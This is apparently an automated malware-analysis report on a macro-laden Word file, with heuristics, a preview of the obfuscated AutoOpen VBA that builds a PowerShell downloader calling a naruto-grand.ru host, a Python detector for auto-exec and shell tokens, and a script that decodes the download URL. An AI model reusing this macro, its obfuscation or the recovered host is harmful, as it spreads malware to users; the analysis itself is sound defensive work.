Verdict: MALICIOUS
Risk score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The file carries a VBA project whose AutoOpen routine ends in a Shell() call. The extracted module DkmcsmWdCGmCTQ builds the command line from Mid() slices of long string literals, interleaved with dead arithmetic over undeclared variables; the decoded slices contain PowerShell syntax (`-object random`, `env:public` behind a `b3T` placeholder, presumably `$env:public`, `[cHAR]` arithmetic, `.rePlaCE(`, `.Message`), so Shell() most likely launches a PowerShell downloader, a stage the ATT&CK mapping above does not list. The URL quoted by the analyzer, 'http://naruto-grand3Dk+3w1W+w1WDk.ru/53Dk+3DkjO3Dk+3DkO3Dk+3Dk4X/', is only partly decoded: it still contains the filler tokens `3Dk+3Dk` and `w1W+w1W` and the `'+'` string concatenation that the payload strips at run time, so it must not be used as an indicator verbatim. Stripping those tokens leaves a host that appears to be under naruto-grand.ru; the quote and variable placeholders (`n70`, `b3T`) are handled by rePlaCE() calls whose replacement values the preview cuts off, so the exact command line is not recoverable from this report alone. The Shell() call, the auto-exec trigger and the obfuscated download URL together mark this as a malicious downloader, and the ClamAV detection Img.Dropper.PhishingLure-6443153-0 agrees with that assessment.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): the macro calls Shell(), which runs an arbitrary command line.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen runs as soon as Word opens the document, so the Shell() call needs no user action beyond enabling macros.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents, or documents whose source extraction fails, where no readable source is available.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen; the rule is meant for the case where no modern VBA project was recovered and no stronger macro-virus family marker was present, and is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: that description does not fit this sample, where a VBA project was recovered (macros.bas under Extracted artifacts), so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as a second execution surface.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label shows which channel (macro, JS, link annotation, document body, ...) reached it.
  - http://naruto-grand3Dk+3w (in document text, OLE body)
  - http://www.medn (in document text, OLE body)
  - http://3Dk+3DkwwIYN8zQ58ZnzSAZt1wpDst1W0BzR0zvH (in document text, OLE body)
  - http://3Dk+3Dw1W+ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  The first four entries are truncated fragments rather than complete URLs; the first matches the host assembled inside the macro and the third and fourth are pure filler-token noise. The last entry is the standard DrawingML namespace URI and has no indicator value.
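The three macro findings above reduce to one check: does an auto-execution name co-occur with a command-execution or download token in a VBA stream, including streams where only compiled p-code or cached strings survive? The following Python is an added illustration written for this page, not the analyzer's own rule code; its token lists, the constructed sample streams, and the mapping of severities to the finding IDs shown above are assumptions. It scans both an 8-bit and a UTF-16LE view of the bytes because VBA project records store some names as Unicode, and it expects compressed source to have been decompressed first (for example by olevba).

```python
import re

# Token lists are assumptions for this example; the report shows the finding IDs,
# not the analyzer's own token tables.
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open",
                   "Document_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "ShellExecute", "WScript.Shell", "CreateObject",
               "URLDownloadToFile", "XMLHTTP", "powershell")


def _pattern(token: str) -> re.Pattern:
    # Match the token as a whole identifier, so "powershell" does not also count as "Shell".
    return re.compile(r"(?<![A-Za-z0-9_])" + re.escape(token) + r"(?![A-Za-z0-9_])",
                      re.IGNORECASE)


def _views(data: bytes):
    """Two text views of one stream: 8-bit (latin-1 keeps every byte) and UTF-16LE,
    because VBA project records store some names as Unicode."""
    yield data.decode("latin-1")
    yield data.decode("utf-16-le", errors="ignore")


def find_tokens(data: bytes, tokens) -> list:
    hits = set()
    for view in _views(data):
        for tok in tokens:
            if _pattern(tok).search(view):
                hits.add(tok)
    return sorted(hits)


def classify_stream(data: bytes) -> dict:
    """Apply the page's three macro heuristics to one already-decompressed stream.
    Compressed source must be decompressed first (e.g. with olevba); raw p-code or
    cache streams can be passed as-is."""
    auto = find_tokens(data, AUTOEXEC_TOKENS)
    exe = find_tokens(data, EXEC_TOKENS)
    findings = []
    if auto:
        findings.append(("OLE_VBA_AUTOOPEN", "high"))
    if "Shell" in exe or "WScript.Shell" in exe:
        findings.append(("OLE_VBA_SHELL", "critical"))
    if auto and exe:
        findings.append(("OLE_VBA_PCODE_AUTOEXEC_EXEC", "high"))
    return {"autoexec": auto, "exec": exe, "findings": findings}


# Constructed sample streams (not from the analysed file).
SAMPLE_DOWNLOADER = b'''Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    Dim cmd As String
    cmd = "powershell -nop -w hidden -enc " & blob
    Shell cmd, vbHide
End Sub
'''
SAMPLE_BENIGN = b'''Sub FormatReport()
    Selection.Font.Bold = True
End Sub
'''
# p-code-like: identifiers survive only as UTF-16LE fragments, no readable source.
SAMPLE_PCODE_ONLY = b"\x00\x00".join(
    t.encode("utf-16-le") for t in ("AutoOpen", "VBA", "Shell"))

if __name__ == "__main__":
    for name, blob in (("downloader", SAMPLE_DOWNLOADER),
                       ("benign", SAMPLE_BENIGN),
                       ("pcode_only", SAMPLE_PCODE_ONLY)):
        print(name, classify_stream(blob))
```

Like the analyzer's rule, this cannot tell a Shell() that runs a harmless helper from one that launches a downloader; the co-occurrence only raises the priority, and the decoded command line (see the summary and the extracted macro) is what settles the verdict.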
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 116160 bytes | 93daf3a0463d6222a3877970ffddd89b92ce0ebbaa7923263850e6b02cf86310 |

Preview (first 1,000 lines of the extracted script). The file concatenates the ThisDocument stream header with the module DkmcsmWdCGmCTQ; its function MKwmUuzCXJj() assembles the payload string from Mid() slices of long literals, separated by padding arithmetic over undeclared variables (dead code whose runtime errors the leading On Error Resume Next swallows):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DkmcsmWdCGmCTQ"
Function MKwmUuzCXJj()
On Error Resume Next
jahHbnzl = 90 / Sqr(5) + famMndsQuCo / CBool(wzZoTTZGt * Sin(461)) * (6739 - 4 / (VwztbvXvCkdo * pALqwwnjcai + XDHFJsT - ChrB(3))) + 90 / Sqr(5) + wFnPtBzswADn / CBool(TjnHcaHG * Sin(461)) * (6739 - 4 / (tYPrErQqtrJEjk * wwwBvkbW + sDUTwjRLdBMPAB - ChrB(3)))
DdwJZC = 90 / Sqr(5) + RXsJIYBmLwLNh / CBool(YIEGkCNS * Sin(461)) * (6739 - 4 / (KhqpmEUcu * sljLEIm + NFSQiSVRZSYbq - ChrB(3))) + 90 / Sqr(5) + zIhcRjPhqUQ / CBool(parwAwzK * Sin(461)) * (6739 - 4 / (NvtzYTV * CDSLQmYdbrD + fOwAXcvZcRa - ChrB(3)))
JRQAEwfd = DEDNQLuzRPbv + Mid("5YIdF8m-ob3Dk'+'+3Dkjw1W+w1Wect rando3Dk+3Dkmw1W+w1W;b3Tb3w1W+w1WDk+3Dkcd = n70http://naruto-grand3Dk+3w'+'1'+'W+w1WDk.ru/53Dk+3D'+'k'+'R3Dk+3DkjO3Dk+3DkO3Dk+3'+'Dk4X/,http://3Dk+3'+Rw84C2icM2Ji", 8, 175) + iphXfMt
PDdVuu = 90 / Sqr(5) + FbIHMdFnwbLfdG / CBool(MRBUzAXz * Sin(461)) * (6739 - 4 / (MZwafYwwvAwUc * KRmQWsmAnF + ovOfCvhiQ - ChrB(3))) + 90 / Sqr(5) + mffHafOkdJqjwr / CBool(MkBFFLl * Sin(461)) * (6739 - 4 / (HrdiQsEOpMZXm * IwMXPKvc + wWcpLjZ - ChrB(3)))
hkCpntrNIS = 90 / Sqr(5) + IjiCnRQz / CBool(TEiPfjqOOHohj * Sin(461)) * (6739 - 4 / (IiaslfdEXANPXV * rhphcFsJZJbUfv + sZbmWXMYfTOPhh - ChrB(3))) + 90 / Sqr(5) + PJVTXZw / CBool(EsQUAjKKzIaHon * Sin(461)) * (6739 - 4 / (zXiIKNOpLbXt * zLYXtZXtG + LpUJQGH - ChrB(3)))
nECiZzFFFcb = 90 / Sqr(5) + wimiLoDshQB / CBool(XzjszQZXkBbhb * Sin(461)) * (6739 - 4 / (Ljjbjdn * ptdRkKohNk + hwQWjFbHYr - ChrB(3))) + 90 / Sqr(5) + CFDJcUIFjYCwKp / CBool(hfPjDnrLt * Sin(461)) * (6739 - 4 / (uNAWEWP * tqXObhUYHAzi + GjUYwrooHLuKEh - ChrB(3)))
inukA = jAmYQwww + Mid("oBG+w1W3Dk+3Dk;bw1W+w1W3Tkar3Dk+3Dka3Dk+3Dk'+'pas3Dk+3Dk = b3Tns3Dk+3w1W+w1WDkada3Dk+3Dksd.n3Dk+3Dkex3DkETIs4RnEVGCpnpwhcoM7nVh", 4, 101) + ZuAXXUQFbFshv
ANQRtSi = 90 / Sqr(5) + NbYWvsRomq / CBool(EsdptLl * Sin(461)) * (6739 - 4 / (CNOQrsVTTqEz * ECKSsdQfFFnh + BJizbwiVEMzLh - ChrB(3))) + 90 / Sqr(5) + aZzwisTAqTX / CBool(hVEwIai * Sin(461)) * (6739 - 4 / (rLkTOFT * ApKGLApGI + FpXBSPcb - ChrB(3)))
uwudhX = 90 / Sqr(5) + kjHZfMVthwPQC / CBool(YMjnJXdCXsPkN * Sin(461)) * (6739 - 4 / (XGunzsiVuz * jDjXbZwqii + CwDjNiI - ChrB(3))) + 90 / Sqr(5) + JvzvVbBcT / CBool(GDSkQZTt * Sin(461)) * (6739 - 4 / (wSRujqREwjN * AMfpbkHOwZz + fXfoRiiQTDM - ChrB(3)))
fVFZpJ = 90 / Sqr(5) + AUsdqsUrnoLzt / CBool(ldfOZRiXdRRA * Sin(461)) * (6739 - 4 / (HMmjbSSDE * CvWUmwnNIHPX + JTHjKdrbMpbN - ChrB(3))) + 90 / Sqr(5) + AFjiaijtcSC / CBool(rbpDJtCkZdQUlH * Sin(461)) * (6739 - 4 / (NIqFvGHviid * hqsjAEiSBBYC + YdFXpOtTHSlmNG - ChrB(3)))
DhEsfFkI = IQHEZcjlP + Mid("zmDdhOIpTd9ODw1W+w1Wk+3Dkpt'+'ion.Message;3Dk+w1W+w1W3Dk}}3Dk).rePlaCE(3Dkb3T3Dkw1W+w1W,3Dkvmn3Dk).reP'+'laCE(([cHARw1W+w1W]110+[cHAR]55+[cHAR'+']48),[s3NsJ", 13, 140) + djcYFABIQohjw
AzkLE = 90 / Sqr(5) + sBPFEWFsFjGqnv / CBool(oLfhWVmPLKdmN * Sin(461)) * (6739 - 4 / (wKwAjza * CJZTFZwRoB + tqEoWpaFlD - ChrB(3))) + 90 / Sqr(5) + bkrnIVKpDzNSJV / CBool(DQMQuVcP * Sin(461)) * (6739 - 4 / (PrWZLIroRH * pbRQdHzzYfXv + OmKsVJYwV - ChrB(3)))
pOLvLz = 90 / Sqr(5) + nICsRVSnWPhs / CBool(wRZiCIhjYkT * Sin(461)) * (6739 - 4 / (NSoWvDi * onplPiFnMV + TSqUsSjENYGPX - ChrB(3))) + 90 / Sqr(5) + pEDdQbLDUnLc / CBool(PUDtTCuzkWwvE * Sin(461)) * (6739 - 4 / (zRziYRCZd * JwuiPzD + QiQkJimN - ChrB(3)))
AZpfmi = 90 / Sqr(5) + YwwTIijU / CBool(tzfXUCS * Sin(461)) * (6739 - 4 / (VtiwLMw * VCTijjUtZFwI + sSDwXFw - ChrB(3))) + 90 / Sqr(5) + QCcYhVCa / CBool(NlBkmjPqU * Sin(461)) * (6739 - 4 / (flwOFJAd * bzoHzbFArFB + STKsKGWF - ChrB(3)))
jzjzpqDPzGR = YQwkiuGZBB + Mid("K+3Dkt(1'+', 3Dk+3Dk343Dk+3Dk3245);b3T3Dk+3Dkhua3Dk+3Dks = b3Dk+3Dk3Tenv3Dk+3Dk:publi'+'c +3Dk+3Dk n70P3Dk+3Dk6T3Dk+3Dkn70 + b3Tkarapas + nw1W+dKTaWAc0V98CIz", 2, 142) + SbwwmnWiqorwE
Fjtcwh = 90 / Sqr(5) + jFiFiMMMmUE / CBool(KlqqB
... (truncated)
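To check the summary's URL claim, here is an added Python script (not part of the analyzer or of the sample) that replays the macro's own string assembly on the Mid() literal copied verbatim from the preview above: VBA Mid() semantics first, then removal of the PowerShell `'+'` concatenation, then removal of the two filler tokens until none remain. The filler-token list and the reading of `'+'` as pure concatenation noise are inferred from the preview, not stated by the report, and the same steps apply to the other Mid() slices in the macro. It also evaluates the `[cHAR]110+[cHAR]55+[cHAR]48` expression the payload feeds to rePlaCE(), which turns out to be the `n70` placeholder that precedes the URL.

```python
import re

# The Mid() argument copied from the extracted macro (function MKwmUuzCXJj, the
# "JRQAEwfd = ... + Mid(...)" line), verbatim from the preview above.
CHUNK = ("5YIdF8m-ob3Dk'+'+3Dkjw1W+w1Wect rando3Dk+3Dkmw1W+w1W;b3Tb3w1W+w1WDk+3Dkcd = "
         "n70http://naruto-grand3Dk+3w'+'1'+'W+w1WDk.ru/53Dk+3D'+'k'+'R3Dk+3DkjO3Dk+3DkO3Dk+3Dk4X/,"
         "http://3Dk+3'+Rw84C2icM2Ji")

# Assumption: these two tokens are pure filler. Both appear only inside otherwise readable
# fragments, and the embedded PowerShell carries .rePlaCE() calls that would remove them.
FILLER_TOKENS = ("3Dk+3Dk", "w1W+w1W")


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start, at most `length` characters."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid raises 'Invalid procedure call' for start < 1 or length < 0")
    return s[start - 1:start - 1 + length]


def strip_ps_concat(s: str) -> str:
    """Remove PowerShell 'a'+'b' string splitting: the quoted '+' is pure noise."""
    return s.replace("'+'", "")


def strip_fillers(s: str, fillers=FILLER_TOKENS) -> str:
    """Delete filler tokens until a fixpoint; removing one token can expose another
    (e.g. '3Dk+3w1W+w1WDk' becomes '3Dk+3Dk' only after the inner token is gone)."""
    prev = None
    while prev != s:
        prev = s
        for tok in fillers:
            s = s.replace(tok, "")
    return s


def decode_chunk(literal: str, start: int, length: int) -> str:
    return strip_fillers(strip_ps_concat(vba_mid(literal, start, length)))


CHAR_EXPR = re.compile(r"\[cHAR\](\d+)", re.IGNORECASE)


def decode_char_expr(expr: str) -> str:
    """Evaluate a '[cHAR]110+[cHAR]55+[cHAR]48' style expression to its string value."""
    codes = CHAR_EXPR.findall(expr)
    if not codes:
        raise ValueError("no [char] terms found")
    return "".join(chr(int(c)) for c in codes)


def extract_urls(s: str) -> list:
    # The payload keeps a comma-separated URL list, so stop at ',' and at quotes.
    return re.findall(r"https?://[^\s,'\"]+", s)


if __name__ == "__main__":
    decoded = decode_chunk(CHUNK, 8, 175)
    print(decoded)
    print(extract_urls(decoded))
    # The rePlaCE() source operand visible in the preview:
    print(decode_char_expr("[cHAR]110+[cHAR]55+[cHAR]48"))
```

The decoded slice reads `-object random;b3Tbcd = n70http://naruto-grand.ru/5RjOO4X/,http://...`, that is, the tail of a `New-Object random` statement followed by a variable assignment holding a comma-separated URL list, with `b3T` standing in for the variable sigil and `n70` for the quote. The preview cuts off the replacement value for `n70`, so the script reports the placeholder rather than guessing it; the second URL in the list is cut off by the Mid() window and continues in another slice.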